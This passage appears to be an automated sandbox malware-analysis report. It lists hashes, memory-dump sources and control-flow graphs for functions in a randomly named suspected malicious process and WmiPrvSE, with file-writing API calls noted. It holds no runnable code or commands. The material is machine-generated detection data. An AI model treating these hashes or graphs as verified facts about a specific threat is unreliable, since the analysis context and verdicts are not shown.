                                                                                                                            • Opcode ID: 39a093ab6cc52270a0cff27e97cf2b26598d24e512708e56ba8612050b96e50d
                                                                                                                            • Instruction ID: 588b64430009a695f7b6fdddac426642dba3c1b49ee6b2ad09469b7da8613514
                                                                                                                            • Opcode Fuzzy Hash: 39a093ab6cc52270a0cff27e97cf2b26598d24e512708e56ba8612050b96e50d
                                                                                                                            • Instruction Fuzzy Hash: 68C08C00F1C81A06E31A7304442023E00038B44608F840470E01EE33CECC9DAD0212C7
                                                                                                                            Function 00007FFD9B8706C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b870000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction ID: a99d8ce0d2c82c1333096778c749cce48e8b33eda9f217b828108744794550ed
                                                                                                                            • Opcode Fuzzy Hash: 666cf8b823b28f899d201f99a08d7ce51af468bea5ae6a0f7c31dc5b3b410cef
                                                                                                                            • Instruction Fuzzy Hash: 19B01200D7744F00E83833FA08E2164F040DB4D10CFC20070D40D420D1984D12942242

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B8709B0 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000021.00000002.2243812920.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_33_2_7ffd9b870000_WmiPrvSE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: c9$!k9$"s9$#{9
                                                                                                                            • API String ID: 0-1692736845
                                                                                                                            • Opcode ID: b3ec4fb66ba4ec25eca8890a8d9937f7ef2261ce4c3adb1d8b3477346e373c56
                                                                                                                            • Instruction ID: 8a99ffe1031c47987eb3b1423a190bc69c166736cdae0bfe1dea7c2e4c54a4cc
                                                                                                                            • Opcode Fuzzy Hash: b3ec4fb66ba4ec25eca8890a8d9937f7ef2261ce4c3adb1d8b3477346e373c56
                                                                                                                            • Instruction Fuzzy Hash: 9D41D297B0D07689E31F33FD79698ED5B48CF8523CB0846B7E05D8B0D79C482086A2E5

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:5%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:12
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 37431 7ffd9b8e77d5 37432 7ffd9b8e7837 CreateFileTransactedW 37431->37432 37434 7ffd9b8e78ea 37432->37434 37419 7ffd9b8e4912 37420 7ffd9b9004d0 GetFileAttributesW 37419->37420 37422 7ffd9b900554 37420->37422 37423 7ffd9b8e4972 37424 7ffd9b8ff020 CloseHandle 37423->37424 37426 7ffd9b8ff0a4 37424->37426 37427 7ffd9b8e79b1 37428 7ffd9b8e7a14 WriteFile 37427->37428 37430 7ffd9b8e7a97 37428->37430

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9BC61B4F Relevance: .7, Instructions: 691COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3071625700.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9bc60000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7d1c80b54ce9a523f1a1a864597916bcd7a43a6010f4591c41bffd254b2a426f
                                                                                                                            • Instruction ID: b00f26c1bd953060f83e2c666e2fa6190b498b7408bee777be90de6483480276
                                                                                                                            • Opcode Fuzzy Hash: 7d1c80b54ce9a523f1a1a864597916bcd7a43a6010f4591c41bffd254b2a426f
                                                                                                                            • Instruction Fuzzy Hash: A942D070A1964ACFDB6CDFA8C4A4ABC77A1FF45301F5041BDC45ECB29ACA38A941CB41
                                                                                                                            Function 00007FFD9B8A0D80 Relevance: .3, Instructions: 273COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3060447598.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9b8a0000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b5024c646ea38fcb05fc5f940c7cad6e4d07b7b5a89218f9c849ca73756c1ad1
                                                                                                                            • Instruction ID: 6cbd0e2b70150b7dc47ab20529e5ac04061482d177ffc2aafbff8bd93509bd6e
                                                                                                                            • Opcode Fuzzy Hash: b5024c646ea38fcb05fc5f940c7cad6e4d07b7b5a89218f9c849ca73756c1ad1
                                                                                                                            • Instruction Fuzzy Hash: 0A910471A19A8D8FE798EB68C8697A97FE1FF5A314F4001BAD04DD72E2DB782411C701
                                                                                                                            Function 00007FFD9BC64205 Relevance: 2.1, Strings: 1, Instructions: 806COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 7ffd9bc64205-7ffd9bc6423e 2 7ffd9bc64244-7ffd9bc64249 0->2 3 7ffd9bc6436c-7ffd9bc64376 0->3 4 7ffd9bc6424f-7ffd9bc64267 2->4 5 7ffd9bc6433b-7ffd9bc64350 2->5 10 7ffd9bc64377-7ffd9bc643d4 3->10 7 7ffd9bc64269-7ffd9bc64279 4->7 8 7ffd9bc6427b-7ffd9bc6429f 4->8 7->8 8->10 13 7ffd9bc642a5-7ffd9bc642b0 8->13 16 7ffd9bc646f1-7ffd9bc646fb 10->16 17 7ffd9bc643da-7ffd9bc643df 10->17 13->5 15 7ffd9bc642b6-7ffd9bc642be 13->15 15->10 18 7ffd9bc642c4-7ffd9bc642d0 15->18 28 7ffd9bc646fc-7ffd9bc6476e 16->28 19 7ffd9bc643e1-7ffd9bc643e4 17->19 20 7ffd9bc643eb-7ffd9bc64404 17->20 22 7ffd9bc642d2-7ffd9bc642de 18->22 23 7ffd9bc64323-7ffd9bc6432b 18->23 19->20 24 7ffd9bc64406-7ffd9bc64416 20->24 25 7ffd9bc64418-7ffd9bc64445 20->25 22->10 29 7ffd9bc642e4-7ffd9bc642f8 22->29 23->10 27 7ffd9bc6432d-7ffd9bc64335 23->27 24->25 25->28 33 7ffd9bc6444b-7ffd9bc64456 25->33 27->5 27->15 60 7ffd9bc64770-7ffd9bc64776 28->60 61 7ffd9bc6478b-7ffd9bc6479c 28->61 31 7ffd9bc64351-7ffd9bc64356 29->31 32 7ffd9bc642fa-7ffd9bc6430d 29->32 34 7ffd9bc64311-7ffd9bc64321 31->34 32->34 37 7ffd9bc64514-7ffd9bc64519 33->37 38 7ffd9bc6445c-7ffd9bc6446a 33->38 34->23 44 7ffd9bc64358-7ffd9bc6436b 34->44 39 7ffd9bc645ad-7ffd9bc645b7 37->39 40 7ffd9bc6451f-7ffd9bc64529 37->40 38->28 41 7ffd9bc64470-7ffd9bc64481 38->41 46 7ffd9bc645d9-7ffd9bc645e0 39->46 47 7ffd9bc645b9-7ffd9bc645c4 39->47 40->28 45 7ffd9bc6452f-7ffd9bc64543 40->45 48 7ffd9bc64483-7ffd9bc644a6 41->48 49 7ffd9bc644e9-7ffd9bc64500 41->49 51 7ffd9bc645e3-7ffd9bc645ed 45->51 46->51 67 7ffd9bc645cb-7ffd9bc645d7 47->67 52 7ffd9bc644ac-7ffd9bc644bf 48->52 53 7ffd9bc64548-7ffd9bc6454d 48->53 49->28 54 7ffd9bc64506-7ffd9bc6450e 49->54 51->28 58 7ffd9bc645f3-7ffd9bc6460b 51->58 56 7ffd9bc644c3-7ffd9bc644e7 52->56 53->56 54->37 54->38 56->49 71 7ffd9bc64552-7ffd9bc64555 56->71 58->28 62 7ffd9bc64611-7ffd9bc64629 58->62 63 7ffd9bc647d1-7ffd9bc64845 60->63 64 7ffd9bc64778-7ffd9bc64789 60->64 65 7ffd9bc6479e-7ffd9bc647ab 61->65 66 7ffd9bc647ad-7ffd9bc647d0 61->66 62->28 68 7ffd9bc6462f-7ffd9bc64663 62->68 100 7ffd9bc64847-7ffd9bc64849 63->100 64->60 64->61 65->66 67->46 68->28 93 7ffd9bc64669-7ffd9bc6467c 68->93 72 7ffd9bc6456b-7ffd9bc64578 71->72 73 7ffd9bc64557-7ffd9bc64567 71->73 72->28 77 7ffd9bc6457e-7ffd9bc645ac 72->77 73->72 94 7ffd9bc6467e-7ffd9bc64689 93->94 95 7ffd9bc646df-7ffd9bc646f0 93->95 94->95 99 7ffd9bc6468b-7ffd9bc646a2 94->99 103 7ffd9bc646a4-7ffd9bc646b2 99->103 104 7ffd9bc646b3-7ffd9bc646d5 99->104 100->100 101 7ffd9bc6484b-7ffd9bc648cd 100->101 119 7ffd9bc648ce 101->119 120 7ffd9bc648cf-7ffd9bc648d1 101->120 103->104 104->95 119->120 120->119
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3071625700.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9bc60000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 0-2564639436
                                                                                                                            • Opcode ID: a74b7d8b8296a847a61ba780ccb32afe1d08295319b5a554783573810ac5556e
                                                                                                                            • Instruction ID: b756a15d37251abffbcda0ae0e8325eea1a13d7ccfa30764137529bbffef269c
                                                                                                                            • Opcode Fuzzy Hash: a74b7d8b8296a847a61ba780ccb32afe1d08295319b5a554783573810ac5556e
                                                                                                                            • Instruction Fuzzy Hash: F5324430A0DB4A8FD759EB68D8A19B977E1FF55314B1401BED08AC71A7DD28F8438781
                                                                                                                            Function 00007FFD9B8E77D5 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 122 7ffd9b8e77d5-7ffd9b8e7862 125 7ffd9b8e786c-7ffd9b8e78e8 CreateFileTransactedW 122->125 126 7ffd9b8e7864-7ffd9b8e7869 122->126 127 7ffd9b8e78ea 125->127 128 7ffd9b8e78f0-7ffd9b8e791a 125->128 126->125 127->128
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3060447598.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9b8d1000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileTransacted
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2149338676-0
                                                                                                                            • Opcode ID: 02d7111059def73e52c93d84c49420fab08be665591842b60aa90148dc1bb5c6
                                                                                                                            • Instruction ID: 360f4b379dc8ba19c223871d7140939b8bb5574d64d6008c1b596ce887a1600a
                                                                                                                            • Opcode Fuzzy Hash: 02d7111059def73e52c93d84c49420fab08be665591842b60aa90148dc1bb5c6
                                                                                                                            • Instruction Fuzzy Hash: 2C419D7191CB5C8FDB58DF58D845AE97BF0EBA9320F0442AFE489D3251CA70A845CB82
                                                                                                                            Function 00007FFD9B8E4962 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 130 7ffd9b8e4962-7ffd9b8e7862 134 7ffd9b8e786c-7ffd9b8e78e8 CreateFileTransactedW 130->134 135 7ffd9b8e7864-7ffd9b8e7869 130->135 136 7ffd9b8e78ea 134->136 137 7ffd9b8e78f0-7ffd9b8e791a 134->137 135->134 136->137
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3060447598.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9b8d1000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileTransacted
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2149338676-0
                                                                                                                            • Opcode ID: 9382942ec69eb8655d262e9d18b9c26ae39225e5b5a740459c713181e4f0d998
                                                                                                                            • Instruction ID: f28e5c3fa1209e6d8761ea736c9398bac0efa9715292b8e4b40cf5a35c0720ad
                                                                                                                            • Opcode Fuzzy Hash: 9382942ec69eb8655d262e9d18b9c26ae39225e5b5a740459c713181e4f0d998
                                                                                                                            • Instruction Fuzzy Hash: 8241707191CB5C8FDB58EF4CD845AA97BF0FB69321F10426EE449E3251CB70A845CB82
                                                                                                                            Function 00007FFD9B8E79B1 Relevance: 1.6, APIs: 1, Instructions: 134fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 139 7ffd9b8e79b1-7ffd9b8e7a41 142 7ffd9b8e7a4b-7ffd9b8e7a95 WriteFile 139->142 143 7ffd9b8e7a43-7ffd9b8e7a48 139->143 144 7ffd9b8e7a97 142->144 145 7ffd9b8e7a9d-7ffd9b8e7ac5 142->145 143->142 144->145
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3060447598.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9b8d1000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 42360242f7fff4beefc48681642d6c0d021d60fe4b169f949e8ecc9e5f4d3181
                                                                                                                            • Instruction ID: addae86517e7d27614be6fc7a69020b934c38503c8f109026b92680077145bba
                                                                                                                            • Opcode Fuzzy Hash: 42360242f7fff4beefc48681642d6c0d021d60fe4b169f949e8ecc9e5f4d3181
                                                                                                                            • Instruction Fuzzy Hash: 6731A031A0CB5C8FDB18DB5898456F9BBF1FBA9311F00426FD089D3292CB74A956CB81
                                                                                                                            Function 00007FFD9B8E4942 Relevance: 1.6, APIs: 1, Instructions: 124fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 146 7ffd9b8e4942-7ffd9b8e7a41 150 7ffd9b8e7a4b-7ffd9b8e7a95 WriteFile 146->150 151 7ffd9b8e7a43-7ffd9b8e7a48 146->151 152 7ffd9b8e7a97 150->152 153 7ffd9b8e7a9d-7ffd9b8e7ac5 150->153 151->150 152->153
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3060447598.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9b8d1000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: e1848495d19e2ad9892d75488739e6b8a8749b332bebd0236696d68fe359a22f
                                                                                                                            • Instruction ID: 3941a4c3093fe180490a7325d1f6047a15c4877ccf06824ec423c4fc6eff51f0
                                                                                                                            • Opcode Fuzzy Hash: e1848495d19e2ad9892d75488739e6b8a8749b332bebd0236696d68fe359a22f
                                                                                                                            • Instruction Fuzzy Hash: CF31B23190CA1C8FDB58EF98D849AF9B7E1FB98311F00426ED04ED3651CB74A945CB81
                                                                                                                            Function 00007FFD9B8E4912 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 154 7ffd9b8e4912-7ffd9b900552 GetFileAttributesW 158 7ffd9b90055a-7ffd9b900576 154->158 159 7ffd9b900554 154->159 159->158
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3060447598.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9b8d1000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 883717d1f57af802bfe274829e14caf55a6ad678c9b6105ad11396d490074010
                                                                                                                            • Instruction ID: c1050a93317aa90848d33d6bd4f321f17acec9f3446691f681307fce3dc5d847
                                                                                                                            • Opcode Fuzzy Hash: 883717d1f57af802bfe274829e14caf55a6ad678c9b6105ad11396d490074010
                                                                                                                            • Instruction Fuzzy Hash: 1421B370A0CA0C9FDB58DB98D845BF9B7E0FB59321F10422ED04ED3651DB706456CB91
                                                                                                                            Function 00007FFD9BC6B048 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3071625700.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9bc60000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: 4580182ad4cc9779aa0b1533a077978a94449c2a03774e53717c5c5f0346f978
                                                                                                                            • Instruction ID: 50fcf8f2aaf577b5ad6cc93ff64ccb14e84556f5e23c2864857d350285261a14
                                                                                                                            • Opcode Fuzzy Hash: 4580182ad4cc9779aa0b1533a077978a94449c2a03774e53717c5c5f0346f978
                                                                                                                            • Instruction Fuzzy Hash: A7516171E0994FDFDB58DBA8C4A19BDBBB1FF54300F1140BAD41AE7292DA392901CB41
                                                                                                                            Function 00007FFD9BC618D8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 160 7ffd9bc618d8-7ffd9bc618f0 162 7ffd9bc618f8-7ffd9bc61923 160->162 166 7ffd9bc6194c-7ffd9bc61952 162->166 167 7ffd9bc61959-7ffd9bc6195f 166->167 168 7ffd9bc61961-7ffd9bc61966 167->168 169 7ffd9bc61925-7ffd9bc6193e 167->169 170 7ffd9bc61853-7ffd9bc61898 168->170 171 7ffd9bc6196c-7ffd9bc619a1 168->171 172 7ffd9bc61944-7ffd9bc61949 169->172 173 7ffd9bc61a35-7ffd9bc61a45 169->173 170->167 177 7ffd9bc6189e-7ffd9bc618a4 170->177 172->166 179 7ffd9bc61a48-7ffd9bc61a96 173->179 180 7ffd9bc61a47 173->180 181 7ffd9bc618a6 177->181 182 7ffd9bc61855-7ffd9bc61a2d 177->182 180->179 185 7ffd9bc618cf-7ffd9bc618d6 181->185 182->173 185->160 186 7ffd9bc618a8-7ffd9bc618c1 185->186 186->173 188 7ffd9bc618c7-7ffd9bc618cc 186->188 188->185
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3071625700.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9bc60000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: c1e6a879a8a0048eb138c27adc455ccab8cd806deaf36669be6e87df2f126ac1
                                                                                                                            • Instruction ID: 8728d7baa7baf05da516127af0f94af220207303fbcacbcf0b8cca52f492a468
                                                                                                                            • Opcode Fuzzy Hash: c1e6a879a8a0048eb138c27adc455ccab8cd806deaf36669be6e87df2f126ac1
                                                                                                                            • Instruction Fuzzy Hash: 16514C71E0960E9FDB58DBE8C464ABDB7B1FF59301F1140BED01AE7296CA342A02CB50
                                                                                                                            Function 00007FFD9BFF16C8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 228 7ffd9bff16c8-7ffd9bff16e0 230 7ffd9bff16e8-7ffd9bff1713 228->230 234 7ffd9bff173c-7ffd9bff1742 230->234 235 7ffd9bff1749-7ffd9bff174f 234->235 236 7ffd9bff1715-7ffd9bff172e 235->236 237 7ffd9bff1751-7ffd9bff1756 235->237 238 7ffd9bff1825-7ffd9bff1835 236->238 239 7ffd9bff1734-7ffd9bff1739 236->239 240 7ffd9bff175c-7ffd9bff1791 237->240 241 7ffd9bff1643-7ffd9bff1688 237->241 247 7ffd9bff1837 238->247 248 7ffd9bff1838-7ffd9bff1886 238->248 239->234 241->235 245 7ffd9bff168e-7ffd9bff1694 241->245 249 7ffd9bff1645-7ffd9bff181d 245->249 250 7ffd9bff1696 245->250 247->248 249->238 253 7ffd9bff16bf-7ffd9bff16c6 250->253 253->228 254 7ffd9bff1698-7ffd9bff16b1 253->254 254->238 257 7ffd9bff16b7-7ffd9bff16bc 254->257 257->253
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3085878303.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9bff0000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: 7e1cb8f7c35414ffa45ca8ee46453fa5de8684a970747908cfbf37a2ae7a7328
                                                                                                                            • Instruction ID: b8250207298ab47b30a4c1ffcf15875cdd837eac97263d75f7baf6b87453d541
                                                                                                                            • Opcode Fuzzy Hash: 7e1cb8f7c35414ffa45ca8ee46453fa5de8684a970747908cfbf37a2ae7a7328
                                                                                                                            • Instruction Fuzzy Hash: E6516E31F0A60E9FDB68DFD8C4A15BDBBB1EF44300F1542BAD01AE7292DA356A01CB40
                                                                                                                            Function 00007FFD9BFFB9C8 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3085878303.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9bff0000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 0-3916222277
                                                                                                                            • Opcode ID: e01fb704c734a8e1762fa0b322385ceea63a5bebe971520a669624bf375b54a6
                                                                                                                            • Instruction ID: a1fc781d0011a1978bd89028ac6313c617eabb4f03c4ceebdd451c87f153107c
                                                                                                                            • Opcode Fuzzy Hash: e01fb704c734a8e1762fa0b322385ceea63a5bebe971520a669624bf375b54a6
                                                                                                                            • Instruction Fuzzy Hash: 21514B71F0964E8FDB69DFD8C4A55BDBBB1EF58300F1141BAC01AE72A6DA356A01CB40
                                                                                                                            Function 00007FFD9B8E4972 Relevance: 1.3, APIs: 1, Instructions: 93COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 295 7ffd9b8e4972-7ffd9b8ff0a2 CloseHandle 299 7ffd9b8ff0aa-7ffd9b8ff0d8 295->299 300 7ffd9b8ff0a4 295->300 300->299
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3060447598.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9b8d1000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: 564fc886d0fec8bac31522a785ccb0713aeb296cada56595b82f438db9470cbf
                                                                                                                            • Instruction ID: 6a9f31472dd0213e4123a222c987d7dcb6e9dd83c6f64b9c3bf58e9320ab0782
                                                                                                                            • Opcode Fuzzy Hash: 564fc886d0fec8bac31522a785ccb0713aeb296cada56595b82f438db9470cbf
                                                                                                                            • Instruction Fuzzy Hash: 1921E230A08A0C8FDB5CDB58C805BF9BBE0FF59321F10422ED04AD3691DB75A856CB90
                                                                                                                            Function 00007FFD9C15083E Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 321 7ffd9c15083e-7ffd9c150848 322 7ffd9c15084f-7ffd9c15088f 321->322
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3091269223.00007FFD9C150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C150000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9c150000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 0-2746444292
                                                                                                                            • Opcode ID: b572c453a194c457eedf41147f725d1b1061d2c5d548599b25bbbe5592ea6c73
                                                                                                                            • Instruction ID: bac4c2e116a8779a4fc925318671170fa80168803e17bee1acecb30af75b2ce7
                                                                                                                            • Opcode Fuzzy Hash: b572c453a194c457eedf41147f725d1b1061d2c5d548599b25bbbe5592ea6c73
                                                                                                                            • Instruction Fuzzy Hash: ABF03A22789A4F8FEB94EB6C9091B59B3A1FB48340F204139D14DC3695CE28F8198791
                                                                                                                            Function 00007FFD9C16058E Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 326 7ffd9c16058e-7ffd9c160591 call 7ffd9c15e030 328 7ffd9c160596-7ffd9c1605b5 326->328 330 7ffd9c1605bb-7ffd9c1605be 328->330 331 7ffd9c160526-7ffd9c16052a 328->331 330->331 332 7ffd9c160610-7ffd9c16062c 331->332 333 7ffd9c160530-7ffd9c160545 331->333 332->331 335 7ffd9c160632-7ffd9c160638 332->335 333->332 335->331
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000022.00000002.3091269223.00007FFD9C150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C150000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_34_2_7ffd9c150000_rCdgcwByUDmMcQzYkDZywyWr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 0-3993045852
